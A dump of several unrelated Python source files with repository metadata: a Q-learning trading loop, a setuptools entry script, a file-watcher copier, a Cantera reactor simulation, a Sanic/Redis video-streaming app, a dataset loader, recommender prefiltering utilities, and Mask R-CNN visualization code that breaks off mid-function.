    signal = pd.Series(index=np.arange(len(indata)))
    for i in range(epochs):
        if i == epochs-1: #the last epoch, use test data set
            indata = load_data(test=True)
            state, xdata, price_data = init_state(indata, test=True)
        else:
            state, xdata, price_data = init_state(indata)
        status = 1
        terminal_state = 0
        time_step = 14
        rewards = get_reward_value_iter(state, time_step, 0, price_data, signal, terminal_state, i)
        #while game still in progress
        while(status == 1):
            #We are in state S
            #Let's run our Q function on S to get Q values for all possible actions
            print('epoch ' + str(i))
            #qval = np.dot(
            # preprocessing.normalize(state.reshape(state.shape[0], -1), norm='l2', axis=0).reshape(state.shape),
            # xdata.reshape(7, -1))
            qval = np.dot(
                preprocessing.normalize(state.reshape(state.shape[0], -1), norm='l2', axis=0).reshape(state.shape),
                rewards)
            # Epsilon-greedy action selection.
            if (random.random() < epsilon): #choose random action
                action = np.random.randint(0,3) #assumes 4 different actions
            else: #choose best action from Q(s,a) values
                action = (np.argmax(qval))
            #Take action, observe new state S'
            new_state, time_step, signal, terminal_state = take_action(state, xdata, action, signal, time_step)
            #Observe reward
            rewards = get_reward_value_iter(new_state, time_step, action, price_data, signal, terminal_state, eval=True, epoch=i)
            #Experience replay storage
            if (len(replay) < buffer): #if buffer not filled, add to it
                replay.append((state, action, rewards, new_state))
                #print(time_step, reward, terminal_state)
            else: #if buffer full, overwrite old values
                if (h < (buffer-1)):
                    h += 1
                else:
                    h = 0
                replay[h] = (state, action, rewards, new_state)
                #randomly sample our experience replay memory
                minibatch = random.sample(replay, batchSize)
                X_train = []
                y_train = []
                for memory in minibatch:
                    #Get max_Q(S',a)
                    old_state, action, rewards, new_state = memory
                    old_qval = model.predict(old_state, batch_size=batch_size)
                    newQ = np.dot(
                        #preprocessing.normalize(state.reshape(state.shape[0], -1), norm='l2', axis=0).reshape(state.shape),
                        #xdata.reshape(7, -1))
                        preprocessing.normalize(state.reshape(state.shape[0], -1), norm='l2', axis=0).reshape(state.shape),
                        rewards)
                    maxQ = np.max(newQ)
                    y = np.zeros((1,7))
                    y[:] = old_qval[:]
                    # Bellman target: r + gamma * max_a Q(S', a) unless terminal.
                    if terminal_state == 0: #non-terminal state
                        update = (np.max(rewards) + (gamma * maxQ))
                    else: #terminal state
                        update = np.max(rewards)
                    y[0][action] = update
                    #print(time_step, reward, terminal_state)
                    X_train.append(old_state)
                    y_train.append(y.reshape(7,))
                X_train = np.squeeze(np.array(X_train), axis=(1))
                y_train = np.array(y_train)
                model.fit(X_train, y_train, batch_size=batchSize, nb_epoch=1, verbose=0)
                # NOTE(review): `state = new_state` sits inside this else
                # branch, so the state never advances while the replay buffer
                # is still filling -- looks like an indentation bug; confirm.
                state = new_state
            if terminal_state == 1: #if reached terminal state, update epoch status
                status = 0
        #eval_reward = evaluate_Q(test_data, model, price_data, i)
        eval_reward = value_iter(test_data, rewards, epsilon, epoch=epochs)
        learning_progress.append((eval_reward))
        print("Epoch #: %s Reward: %f Epsilon: %f" % (i,np.max(eval_reward), epsilon))
        #learning_progress.append((reward))
        if epsilon > 0.1: #decrement epsilon over time
            epsilon -= (1.0/epochs)
    elapsed = np.round(timeit.default_timer() - start_time, decimals=2)
    print("Completed in %f" % (elapsed,))
    # Final backtest summary and plots of trades, P&L, and learning progress.
    bt = twp.Backtest(pd.Series(data=[x[0,0] for x in xdata]), signal, signalType='shares')
    bt.data['delta'] = bt.data['shares'].diff().fillna(0)
    print(bt.data)
    unique, counts = np.unique(filter(lambda v:v==v,signal.values), return_counts=True)
    print(np.asarray((unique, counts)).T)
    plt.figure()
    plt.subplot(3,1,1)
    bt.plotTrades()
    plt.subplot(3,1,2)
    bt.pnl.plot(style='x-')
    plt.subplot(3,1,3)
    plt.plot(learning_progress)
    plt.savefig('plt/value_iter_summary'+'.png', bbox_inches='tight', pad_inches=1, dpi=72)
    #plt.show()
|
[
"jehung@me.com"
] |
jehung@me.com
|
39d136944a76de3a92cde68edd3581533364e3f0
|
127fa080496be33be7ac47b0125b8f8b94acf9b1
|
/LocalWindows_May2021/PycharmProjects - ee361/Test/venv/Scripts/easy_install-3.6-script.py
|
6bf49a4e98cf81e51e22f628d564929b3f93d9fd
|
[] |
no_license
|
pschmid1818/Clarkson-School-Projects
|
53d1ce7c3d62bae34835d5bae78936ea6fe0109b
|
88e1e01fa0e512a1f1aaa78882e659682e271672
|
refs/heads/master
| 2023-05-05T14:30:45.156017
| 2021-06-01T03:33:13
| 2021-06-01T03:33:13
| 372,693,906
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 456
|
py
|
#!C:\Users\Schmid\PycharmProjects\Test\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.6'
# NOTE: auto-generated by setuptools; do not edit by hand.
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    # Strip the '-script.py'/'.exe' suffix so argv[0] matches the console name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.6')()
    )
|
[
"schmidp@clarkson.edu"
] |
schmidp@clarkson.edu
|
792ad6eb3efb07738f5be34185c1d02e94374ee1
|
fedcfedd334adfca79259cdf1c2366b522dfe07e
|
/watcher2.py
|
f95870c13ae6c015105751a25756aeab27b31895
|
[] |
no_license
|
Zuya14/watcher
|
3d326b6814f62067f472e438aa271e92d6db941e
|
f6ed00ac3d35f452f04dea3fbdcb0b30ebd8d707
|
refs/heads/main
| 2023-07-22T18:21:00.027114
| 2021-09-01T00:52:27
| 2021-09-01T00:52:27
| 399,185,519
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,522
|
py
|
from watchdog.events import PatternMatchingEventHandler
from watchdog.observers import Observer
import os
import time
import csv
import shutil
class FileChangeHandler(PatternMatchingEventHandler):
    """Watches the given files and snapshots them once writes settle down.

    After the most recent create/modify event, waits *margin_time* seconds of
    quiet (polled via check_update), then copies every watched file into
    ``copy_path/<deg>/`` for the next pending angle in *degs*.
    """

    def __init__(self, patterns, copy_path, degs, margin_time):
        super(FileChangeHandler, self).__init__(patterns=patterns)
        self.copy_path = copy_path
        self.finish = False
        self.degs = degs
        self.old_time = -1           # timestamp of the latest FS event; -1 = none yet
        self.margin_time = margin_time
        self.count = 0               # number of angles copied so far
        self.is_copied = True        # True once the current batch was saved

    def on_created(self, event):
        """A watched file appeared: restart the quiet timer, mark batch dirty."""
        self.old_time = time.time()
        self.is_copied = False

    def on_modified(self, event):
        """A watched file changed: restart the quiet timer, mark batch dirty."""
        self.old_time = time.time()
        self.is_copied = False

    def on_deleted(self, event):
        pass

    def on_moved(self, event):
        pass

    def check_update(self):
        """Copy the batch once margin_time has elapsed since the last event."""
        if self.old_time == -1:
            self.old_time = time.time()
            return
        if time.time() - self.old_time >= self.margin_time:
            self.copy_all_files()

    def copy_all_files(self):
        """Copy every watched file into the directory for the current angle."""
        if self.is_copied or self.count >= len(self.degs):
            return
        dest_dir = self.copy_path + '/{:d}'.format(self.degs[self.count])
        if not os.path.exists(dest_dir):
            os.makedirs(dest_dir)
        for src_path in self.patterns:
            dest_file = dest_dir + '/{:s}'.format(os.path.basename(src_path))
            shutil.copyfile(src_path, dest_file)
            print("save: {:s}".format(dest_file))
        self.is_copied = True
        self.count += 1

    def check_finish(self):
        """Return True once every angle in degs has been copied."""
        return self.count >= len(self.degs)
if __name__ == "__main__":
###### read parameter.csv ######
restartFlag = True
while restartFlag:
param = {}
if not os.path.exists('./parameter.csv'):
print("can't find parameter.csv")
time.sleep(3)
exit()
with open('./parameter.csv') as f:
reader = csv.reader(f, skipinitialspace=True)
for row in reader:
if row[0] == 'copy_path':
param[row[0]] = row[1]
elif row[0] == 'restart':
param[row[0]] = int(row[1])
restartFlag = not (0 == int(row[1]))
else:
param[row[0]] = int(row[1])
dir_split = param['copy_path'].split('_')
dir_base = '_'.join(dir_split[:-1])
dir_number = int(dir_split[-1])
# dir_base = param['copy_path'].split('_')[:-1]
# print(dir_base)
# print(dir_number)
# print('{:02}'.format(dir_number))
# print('{:02}'.format(111))
degs = list(range(param['start_deg'], param['end_deg']+1, param['deg_step']))
if len(degs) < 1:
print("degree setting is wrong!")
time.sleep(3)
exit()
if param['repeat'] == 1:
dist_path = [param['copy_path']]
elif param['repeat'] > 1:
dist_path = [param['copy_path'] + '/{:d}'.format(i+1) for i in range(param['repeat'])]
else:
print("repeat setting is wrong!")
time.sleep(3)
exit()
if param['check_time'] < 10:
print("check_time must be at least 10!")
time.sleep(3)
exit()
if param['margin_time'] < 10:
print("margin_time must be at least 10!")
time.sleep(3)
exit()
if param['finish_wait'] < 10:
print("finish_wait must be at least 10!")
time.sleep(3)
exit()
print("read parameter.csv")
###### read file_path_list.txt ######
if not os.path.exists('./file_path_list.txt'):
print("can't find file_path_list.txt")
time.sleep(3)
exit()
with open('./file_path_list.txt') as f:
file_paths = [l.replace("\n", "") for l in f.readlines()]
print("read file_path_list.txt")
###### watch files ######
for i in range(param['repeat']):
event_handler = FileChangeHandler(file_paths, dist_path[i], degs, param['margin_time']/1000)
observer = Observer()
observer.schedule(event_handler, os.path.dirname(file_paths[0]), recursive=True)
observer.start()
print("watching...")
try:
while True:
time.sleep(param['check_time']/1000)
event_handler.check_update()
if event_handler.check_finish():
time.sleep(param['finish_wait']/1000)
if param['repeat'] > 1:
print("finish:{:d}".format(i+1))
else:
print("finish")
observer.stop()
break
except KeyboardInterrupt:
observer.stop()
exit()
observer.join()
if restartFlag:
with open('./parameter.csv', 'w') as f:
for key in param:
if key == 'copy_path':
f.write(key + ',' + dir_base + '_' + '{:02}'.format(dir_number+1) + '\n')
else:
f.write(key + ',' + str(param[key]) + '\n')
|
[
"s.ishizuya@gmail.com"
] |
s.ishizuya@gmail.com
|
c14e4e6b0c57726048f651e0fe8dfea72fe11593
|
be413ec75c6498dd1b4139a530c8b95a479f8501
|
/examples/reactor1.py
|
2bc24af7b19cd7d8e2334deb584668280a54efa7
|
[
"MIT"
] |
permissive
|
Zeracesharon/code_transfer_rt
|
9898f4c19df5e452519ca3a385dabcebc999bd1c
|
b394fb6c322b2dc6f0f5dbcb93baf52f94032772
|
refs/heads/master
| 2022-12-12T12:01:21.119544
| 2020-09-02T05:44:44
| 2020-09-02T05:44:44
| 291,857,458
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,848
|
py
|
"""
Constant-pressure, adiabatic kinetics simulation.
Requires: cantera >= 2.5.0, matplotlib >= 2.0
"""
import sys
import cantera as ct
from time import perf_counter
t0_start = perf_counter()
gas = ct.Solution('ic8_ver3_mech.yaml')
gas.TPX = 1200.0, ct.one_atm*20, 'IC8H18:1.0,O2:12.5,N2:47.00'
r = ct.IdealGasConstPressureReactor(gas)
sim = ct.ReactorNet([r])
sim.verbose = True
# limit advance when temperature difference is exceeded
#delta_T_max = 20.
#r.set_advance_limit('temperature', delta_T_max)
dt_max = 1.e-6
t_end = 100000 * dt_max
states = ct.SolutionArray(gas, extra=['t'])
print('{:10s} {:10s} {:10s} {:14s}'.format(
't [s]', 'T [K]', 'P [Pa]', 'u [J/kg]'))
while sim.time < t_end:
sim.advance(sim.time + dt_max)
states.append(r.thermo.state, t=sim.time*1e3)
print('{:10.3e} {:10.3f} {:10.3f} {:14.6f}'.format(
sim.time, r.T, r.thermo.P, r.thermo.u))
t_stop = perf_counter()
print('time spent {:.1e} [s]'.format(t_stop - t0_start))
# Plot the results if matplotlib is installed.
# See http://matplotlib.org/ to get it.
if '--plot' in sys.argv[1:]:
import matplotlib.pyplot as plt
plt.clf()
plt.subplot(2, 2, 1)
plt.plot(states.t, states.T)
plt.xlabel('Time (ms)')
plt.ylabel('Temperature (K)')
plt.subplot(2, 2, 2)
plt.plot(states.t, states.X[:, gas.species_index('OH')])
plt.xlabel('Time (ms)')
plt.ylabel('OH Mole Fraction')
plt.subplot(2, 2, 3)
plt.plot(states.t, states.X[:, gas.species_index('H')])
plt.xlabel('Time (ms)')
plt.ylabel('H Mole Fraction')
plt.subplot(2, 2, 4)
plt.plot(states.t, states.X[:, gas.species_index('H2')])
plt.xlabel('Time (ms)')
plt.ylabel('H2 Mole Fraction')
plt.tight_layout()
plt.show()
else:
print("To view a plot of these results, run this script with the option --plot")
|
[
"j51601071066@sjtu.edu.cn"
] |
j51601071066@sjtu.edu.cn
|
bd2ae9309e7631af3bfdc3ec5029c84fbbf0208c
|
69e89c0290ef5d2418a11cb1963a7c14240d120e
|
/sanic-video-streaming/app.py
|
c00f35baf9fd11266cdc7d7f877c99f2a35beff8
|
[] |
no_license
|
baojiweicn/Thinking-in-Coroutines
|
4d0a433c5969c9f3f941dbfea0199bc199383fd3
|
b11327fede95384e74a9361841fcb545c310b992
|
refs/heads/master
| 2020-03-19T01:11:02.387204
| 2018-06-04T09:32:13
| 2018-06-04T09:32:13
| 135,527,997
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,499
|
py
|
import asyncio
import os
import logging
# BUG FIX: import_module is used below when the CAMERA environment variable is
# set, but it was never imported — that branch raised NameError at startup.
from importlib import import_module
if os.environ.get('CAMERA'):
    # Select a camera backend module by name, e.g. CAMERA=pi -> camera_pi.py
    Camera = import_module('camera_' + os.environ['CAMERA']).Camera
else:
    from camera import Camera
import aredis
from sanic import Sanic, response
app = Sanic(__name__)
# Serve everything under ./templates at the site root (incl. index.html).
app.static('/','./templates')
logger = logging.getLogger('chat')
class Redis:
    """Lazily-initialised holder for a single shared aredis client."""

    # Shared connection object; created on first use.
    _pool = None

    async def get_redis_pool(self):
        """Return the cached StrictRedis client, creating it on first call."""
        if self._pool:
            return self._pool
        self._pool = aredis.StrictRedis(host='localhost', port=6379)
        return self._pool


redis = Redis()
@app.listener('before_server_start')
async def before_srver_start(app, loop):
    # Attach the shared Redis client to the app before serving requests.
    # (Function name has a typo but is only referenced via the decorator.)
    app.broker = await redis.get_redis_pool()
@app.route("/index")
async def index(request):
return response.redirect("index.html")
async def subscribe(request,ws):
    """Forward every message published on the 'room1' channel to the
    websocket. Runs until the connection drops; pairs with publish()."""
    subscriber = request.app.broker.pubsub()
    await subscriber.subscribe(['room1'])
    # The first message is the subscription confirmation; read and discard it.
    msg = await subscriber.get_message()
    while True:
        msg = await subscriber.get_message()
        # NOTE(review): aredis get_message() can return None when nothing is
        # pending, in which case msg['data'] would raise TypeError — confirm
        # this call blocks here, or add a None guard.
        data = msg['data']
        logger.info(msg)
        try:
            # Text payloads are decoded; non-UTF-8 payloads (camera frames)
            # fall through and are sent as raw bytes.
            data = data.decode()
        except Exception:
            pass
        await ws.send(data)
async def publish(request,ws):
    """Continuously push camera frames onto the 'room1' Redis channel.

    The frame payload comes from the Camera helper (opaque here — presumably
    encoded image bytes; verify against the camera module).
    """
    camera = Camera()
    while True:
        frame = camera.get_frame()
        await request.app.broker.publish('room1', frame)
@app.websocket('/chat')
async def chat(request, ws):
    """Websocket endpoint: run the camera publisher and the Redis subscriber
    concurrently for the lifetime of the connection."""
    await asyncio.gather(publish(request,ws),subscribe(request,ws))
if __name__ == '__main__':
    app.run(host="0.0.0.0", port=8000, debug=True)
|
[
"baojiwei@kezaihui.com"
] |
baojiwei@kezaihui.com
|
a441853d154eee540f32e236f10199178fbec6c4
|
7d12cb2a55406f46c131a53052de610852b8ddff
|
/event-collector/collector/filter/location.py
|
fe12a7ecd8a3bfd0b2f4b9e3262a7415fd26c439
|
[] |
no_license
|
ivarsv/liepajasafisa
|
19015747de7b5d9f72b60512c8433fd62cd6c084
|
b0f31069f84cb84c67c5fe01c3d6c78ee0040728
|
refs/heads/master
| 2020-04-06T06:45:34.475368
| 2013-11-28T18:52:32
| 2013-11-28T18:52:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 650
|
py
|
# coding=utf8
from collector.model import ComparisonFilter
# Location alias groups: each inner list holds names that refer to the same
# venue, ordered from highest to lowest priority (the lowest index wins when
# two events from the same group are compared — see LocationGroupPriority).
groups = []
groups.append([u"Jauno mediju mākslas laboratorija", u"Liepājas Universitāte"])
groups.append([u"Red Sun Buffet", u"Kokteiļbārs \"Red Sun Buffet\""])
groups.append([u"Ideju bode", u"Radošā telpa \"Ideju bode\""])
class LocationGroupPriority(ComparisonFilter):
    """Normalise event locations: when both events' locations belong to the
    same alias group, rewrite both to the highest-priority (lowest-index)
    alias in that group."""

    def modify(self, event1, event2):
        for group in groups:
            try:
                # list.index raises ValueError when a location is not in the
                # group; keep the try body minimal so only that lookup is caught.
                index = min(group.index(event1.location), group.index(event2.location))
            except ValueError:
                # BUG FIX: was a bare `except:` which also swallowed
                # KeyboardInterrupt/SystemExit and any unrelated error.
                continue
            event1.location = group[index]
            event2.location = group[index]
|
[
"ivarsv@gmail.com"
] |
ivarsv@gmail.com
|
68674be51f1c5fc7a44c0f19119a639c39055abd
|
661d07470126790629f29efb7aa0f431b771b660
|
/test_dataset.py
|
80a7cd22518aeee249997e3ca54edae3b0c84256
|
[] |
no_license
|
johndpope/fcnn_detector
|
a43daf38e3736f1644c7340050f5da4ad2147742
|
e97525708161b6673ed53324dc5c85370d2f97c6
|
refs/heads/master
| 2021-01-12T04:40:00.177807
| 2016-10-15T14:15:14
| 2016-10-15T14:15:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,761
|
py
|
""" Create a class to hold the Dataset generation """
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import cv2
import numpy as np
DEBUG = False
class TestDataset(object):
    """Collects the image paths under a root directory and yields
    normalised, network-ready (1, H, W, C) float32 batches one at a time."""

    def __init__(self, root_dir):
        """
        Creates an instance of Dataset holder.
        Store all test image paths into memory.
        root_dir: Specifies the directory to load the data from.
        """
        self.images_paths = []
        self.init_dataset(root_dir)

    def init_directory(self, images_dir):
        """Recursively collect every file path under `images_dir`."""
        for dir_name, _, file_list in os.walk(images_dir):
            for file_name in file_list:
                image_file = os.path.join(dir_name, file_name)
                self.images_paths.append(image_file)
        print("Loaded {} images.".format(len(self.images_paths)))

    def init_dataset(self, root_dir):
        """Normalise the root path and index its contents."""
        if not root_dir.endswith('/'):
            root_dir = root_dir + '/'
        self.init_directory(root_dir)

    @staticmethod
    def get_image(path):
        """Read the image at `path` as a single-channel grayscale array."""
        return cv2.imread(path, cv2.IMREAD_GRAYSCALE)

    @staticmethod
    def normalize(mat):
        """Scale uint8 pixel values to float32 in [0, 1]."""
        return mat.astype(np.float32) / 255.0

    def iterate_set(self, input_size):
        """Yield one (1, in_h, in_w, in_c) float32 batch per stored image.

        Note: the same `inputs` buffer is reused between yields.
        """
        in_h, in_w, in_c = input_size
        inputs = np.empty((1, in_h, in_w, in_c), dtype=np.float32)
        for path in self.images_paths:
            image = self.get_image(path)
            # BUG FIX: cv2.resize takes dsize as (width, height). The original
            # passed (in_h, in_w), producing an (in_w, in_h) array that broke
            # the assignment below for any non-square input_size.
            image = cv2.resize(image, (in_w, in_h), interpolation=cv2.INTER_AREA)
            inputs[0, :, :, 0] = self.normalize(image)
            yield inputs
|
[
"laurent.decamp@gmail.com"
] |
laurent.decamp@gmail.com
|
9084a6c8e1d09a461a2e3f5b9dbde5c8b8ab30ae
|
bbb0860aa87d0e49e0e3099b553c744961fb0189
|
/ИТОГ ПРОЕКТ СДАЧА/src/utils.py
|
6fdaa4b41c9533db57f3b00c6c07a67ef28f687b
|
[] |
no_license
|
bigdatacon/ML
|
16618ffd837c734d2e5d8afae6d0dd1cd7e8c725
|
fa6b0a66f9fec5f2e648a8782f7166f9015c5df6
|
refs/heads/master
| 2022-11-24T06:23:48.377470
| 2020-08-02T19:58:45
| 2020-08-02T19:58:45
| 263,444,620
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,608
|
py
|
import pandas as pd
import numpy as np
def prefilter_items(data, take_n_popular=2000, item_features=None):
# Уберем самые популярные товары (их и так купят)
popularity = data.groupby('item_id')['user_id'].nunique().reset_index() / data['user_id'].nunique()
popularity.rename(columns={'user_id': 'share_unique_users'}, inplace=True)
top_popular = popularity[popularity['share_unique_users'] > 0.2].item_id.tolist()
data = data[~data['item_id'].isin(top_popular)]
# Уберем самые НЕ популярные товары (их и так НЕ купят)
top_notpopular = popularity[popularity['share_unique_users'] < 0.02].item_id.tolist()
data = data[~data['item_id'].isin(top_notpopular)]
# Уберем товары, которые не продавались за последние 12 месяцев
# Уберем не интересные для рекоммендаций категории (department)
if item_features is not None:
department_size = pd.DataFrame(item_features.\
groupby('department')['item_id'].nunique().\
sort_values(ascending=False)).reset_index()
department_size.columns = ['department', 'n_items']
rare_departments = department_size[department_size['n_items'] < 150].department.tolist()
items_in_rare_departments = item_features[item_features['department'].isin(rare_departments)].item_id.unique().tolist()
data = data[~data['item_id'].isin(items_in_rare_departments)]
# Уберем слишком дешевые товары (на них не заработаем). 1 покупка из рассылок стоит 60 руб.
data['price'] = data['sales_value'] / (np.maximum(data['quantity'], 1))
data = data[data['price'] > 2]
# Уберем слишком дорогие товарыs
data = data[data['price'] < 50]
# Возбмем топ по популярности
popularity = data.groupby('item_id')['quantity'].sum().reset_index()
popularity.rename(columns={'quantity': 'n_sold'}, inplace=True)
top = popularity.sort_values('n_sold', ascending=False).head(take_n_popular).item_id.tolist()
# Заведем фиктивный item_id (если юзер покупал товары из топ-5000, то он "купил" такой товар)
data.loc[~data['item_id'].isin(top), 'item_id'] = 999999
# ...
return data
def postfilter_items(user_id, recommednations):
pass
|
[
"noreply@github.com"
] |
bigdatacon.noreply@github.com
|
1693c758f2c5cf600463f7be6a97c24efec33c8a
|
79a5a03461ff0c8905ced690b5c900bc2c031525
|
/visualize.py
|
d6dc0e7cca9ea31634538410556fa76e3549c34b
|
[] |
no_license
|
himanshucodz55/Social_Distancing_Ai_COVID19
|
f5ba1146acf8ead00b944e558aad46313a549076
|
ff138b7f3d6d109722a19fbad1b87d68e0da3a5d
|
refs/heads/master
| 2022-12-10T22:58:39.752672
| 2020-09-02T17:43:57
| 2020-09-02T17:43:57
| 292,346,633
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 23,401
|
py
|
"""
Mask R-CNN
Display and Visualization Functions.
Copyright (c) 2017 Matterport, Inc.
Licensed under the MIT License (see LICENSE for details)
Written by Waleed Abdulla
"""
import random
import itertools
import colorsys
import numpy as np
from skimage.measure import find_contours
import matplotlib.pyplot as plt
import matplotlib.patches as patches
import matplotlib.lines as lines
from matplotlib.patches import Polygon
import IPython.display
import utils
import cv2
############################################################
# Visualization
############################################################
def display_images(images, titles=None, cols=4, cmap=None, norm=None,
                   interpolation=None):
    """Display the given set of images, optionally with titles.
    images: list or array of image tensors in HWC format.
    titles: optional. A list of titles to display with each image.
    cols: number of images per row
    cmap: Optional. Color map to use. For example, "Blues".
    norm: Optional. A Normalize instance to map values to colors.
    interpolation: Optional. Image interpolation to use for display.
    """
    titles = titles if titles is not None else [""] * len(images)
    rows = len(images) // cols + 1
    plt.figure(figsize=(14, 14 * rows // cols))
    i = 1
    for image, title in zip(images, titles):
        plt.subplot(rows, cols, i)
        plt.title(title, fontsize=9)
        plt.axis('off')
        # NOTE(review): the imshow call is commented out, so this currently
        # shows empty titled subplots only — confirm that is intentional.
        # plt.imshow(image.astype(np.uint8), cmap=cmap,
        #            norm=norm, interpolation=interpolation)
        i += 1
    plt.show()
# Fixed seed so the shuffled palette below is reproducible across runs.
random.seed(0)
# Shared HSV palette: 90 evenly-spaced hues at full saturation/brightness,
# shuffled once and reused by random_colors() and class_color().
N=90
brightness = 1.0
hsv = [(i / N, 1, brightness) for i in range(N)]
random.shuffle(hsv)
def random_colors(N, bright=True):
    """
    Generate random colors.
    To get visually distinct colors, generate them in HSV space then
    convert to RGB.
    """
    # NOTE(review): both parameters are ignored — this always converts the
    # 90-entry module-level `hsv` palette. A caller indexing colors[i] with
    # i >= 90 would fail; confirm N never exceeds 90.
    all_colors = list(map(lambda c: colorsys.hsv_to_rgb(*c), hsv))
    return all_colors
def class_color(id, prob):
    """Map a class id to an RGB colour whose brightness encodes `prob`.

    id:   index into the module-level shuffled `hsv` palette.
    prob: value placed in the HSV "value" channel (0..1).
    """
    hue, saturation, _ = hsv[id]
    return colorsys.hsv_to_rgb(hue, saturation, prob)
def apply_mask(image, mask, color, alpha=0.5):
    """Alpha-blend `color` into `image` wherever `mask` equals 1.

    image: HxWx3 array, mutated in place channel by channel.
    mask:  HxW array of 0/1 values.
    color: RGB triple in [0, 1]; scaled by 255 before blending.
    alpha: blend weight of the overlay colour.
    Returns the (mutated) image for convenience.
    """
    selected = mask == 1
    for channel in range(3):
        blended = image[:, :, channel] * (1 - alpha) + alpha * color[channel] * 255
        image[:, :, channel] = np.where(selected, blended, image[:, :, channel])
    return image
def display_instances(image, boxes, masks, class_ids, class_names,scores=None, title="",figsize=(16, 16), ax=None,risky=None,index=None):
    """
    boxes: [num_instance, (y1, x1, y2, x2, class_id)] in image coordinates.
    masks: [num_instances, height, width]
    class_ids: [num_instances]
    class_names: list of class names of the dataset
    scores: (optional) confidence scores for each box
    figsize: (optional) the size of the image.
    risky: (optional) ids to highlight in red instead of green.
    index: instance ids to draw; when None the function draws nothing and
        returns None.
    """
    if index is not None:
        # Number of instances
        N = boxes.shape[0]
        # if not N:
        #     print("\n*** No instances to display *** \n")
        # else:
        #     assert boxes.shape[0] == masks.shape[-1] == class_ids.shape[0]
        if not ax:
            _, ax = plt.subplots(1, figsize=figsize)
        # Generate random colors
        colors = random_colors(N)
        # Show area outside image boundaries.
        height, width = image.shape[:2]
        ax.set_ylim(height + 10, -10)
        ax.set_xlim(-10, width + 10)
        ax.axis('off')
        ax.set_title(title)
        # NOTE(review): `l` indexes `boxes` sequentially while `i` (from
        # `index`) indexes masks/class_ids — this assumes boxes are supplied
        # in the same order as `index`; confirm against the caller.
        l=0
        masked_image = image.astype(np.uint32).copy()
        for i in index:
            # color = colors[i]
            # print("##################################",i,color)
            # Fixed colours: green for normal instances, red for risky ones.
            color=(0.26666666666666683, 1.0, 0.25)
            color1=(0.0,0.0,1.0)
            # Bounding box
            if not np.any(boxes[l]):
                # Skip this instance. Has no bbox. Likely lost in image cropping.
                continue
            y1, x1, y2, x2 = boxes[l]
            l+=1
            # p = patches.Rectangle((x1, y1), x2 - x1, y2 - y1, linewidth=2,
            #                       alpha=0.7, linestyle="dashed",
            #                       edgecolor=None, facecolor='none')
            # ax.add_patch(p)
            # ax.circle()
            # ax.Circle( ((x1+x2)/2,y2), 5, (0, 0, 255), -1)
            # center= plt.Circle(((x1+x2)/2,y2),5,color="blue")
            # ax.add_patch(center)
            if class_ids[i]==1:
                # Label
                class_id = class_ids[i]
                score = scores[i] if scores is not None else None
                label = class_names[class_id]
                x = random.randint(x1, (x1 + x2) // 2)
                caption = "{} {:.3f}".format(label, score) if score else label
                ax.text(x1, y1 + 8, caption,color='w', size=11, backgroundcolor="none")
                # Mask
                if (risky is not None) and (i in risky):
                    # ii=risky[i]
                    # print("risky_ids: ",i)
                    mask = masks[:, :, i]
                    masked_image = apply_mask(masked_image, mask, color1)
                    # Mask Polygon
                    # Pad to ensure proper polygons for masks that touch image edges.
                    padded_mask = np.zeros((mask.shape[0] + 2, mask.shape[1] + 2), dtype=np.uint8)
                    padded_mask[1:-1, 1:-1] = mask
                    contours = find_contours(padded_mask, 0.5)
                    for verts in contours:
                        # Subtract the padding and flip (y, x) to (x, y)
                        verts = np.fliplr(verts) - 1
                        p = Polygon(verts, facecolor="none", edgecolor=color1)
                        ax.add_patch(p)
                else:
                    mask = masks[:, :, i]
                    masked_image = apply_mask(masked_image, mask, color)
                    # Mask Polygon
                    # Pad to ensure proper polygons for masks that touch image edges.
                    padded_mask = np.zeros((mask.shape[0] + 2, mask.shape[1] + 2), dtype=np.uint8)
                    padded_mask[1:-1, 1:-1] = mask
                    contours = find_contours(padded_mask, 0.5)
                    for verts in contours:
                        # Subtract the padding and flip (y, x) to (x, y)
                        verts = np.fliplr(verts) - 1
                        p = Polygon(verts, facecolor="none", edgecolor=color)
                        ax.add_patch(p)
        # ax.imshow(masked_image.astype(np.uint8))
        return masked_image.astype(np.uint8)
def draw_instances(image, boxes, masks, class_ids, class_names,
                   scores=None, title="",
                   figsize=(16, 16), ax=None):
    """
    Draw boxes, labels, masks and contours directly onto the image with
    OpenCV (no matplotlib axis) and return the annotated array.
    boxes: [num_instance, (y1, x1, y2, x2, class_id)] in image coordinates.
    masks: [num_instances, height, width]
    class_ids: [num_instances]
    class_names: list of class names of the dataset
    scores: (optional) confidence scores for each box
    figsize: (optional) the size of the image.
    """
    # Number of instances
    N = boxes.shape[0]
    if not N:
        print("\n*** No instances to display *** \n")
    else:
        assert boxes.shape[0] == masks.shape[-1] == class_ids.shape[0]
    # if not ax:
    #     _, ax = plt.subplots(1, figsize=figsize)
    # Generate random colors
    colors = random_colors(N)
    # Show area outside image boundaries.
    height, width = image.shape[:2]
    masked_image = image.copy()
    for i in range(N):
        class_id = class_ids[i]
        score = scores[i] if scores is not None else None
        # color = colors[i]
        # score**4 darkens low-confidence detections sharply.
        color = class_color(class_id,score*score*score*score)
        # Bounding box
        if not np.any(boxes[i]):
            # Skip this instance. Has no bbox. Likely lost in image cropping.
            continue
        y1, x1, y2, x2 = boxes[i]
        # p = patches.Rectangle((x1, y1), x2 - x1, y2 - y1, linewidth=2,
        #                       alpha=0.7, linestyle="dashed",
        #                       edgecolor=color, facecolor='none')
        cv2.rectangle(masked_image, (x1, y1),(x2, y2), [int(x*255) for x in (color)],4)
        # Label
        label = class_names[class_id]
        x = random.randint(x1, (x1 + x2) // 2)
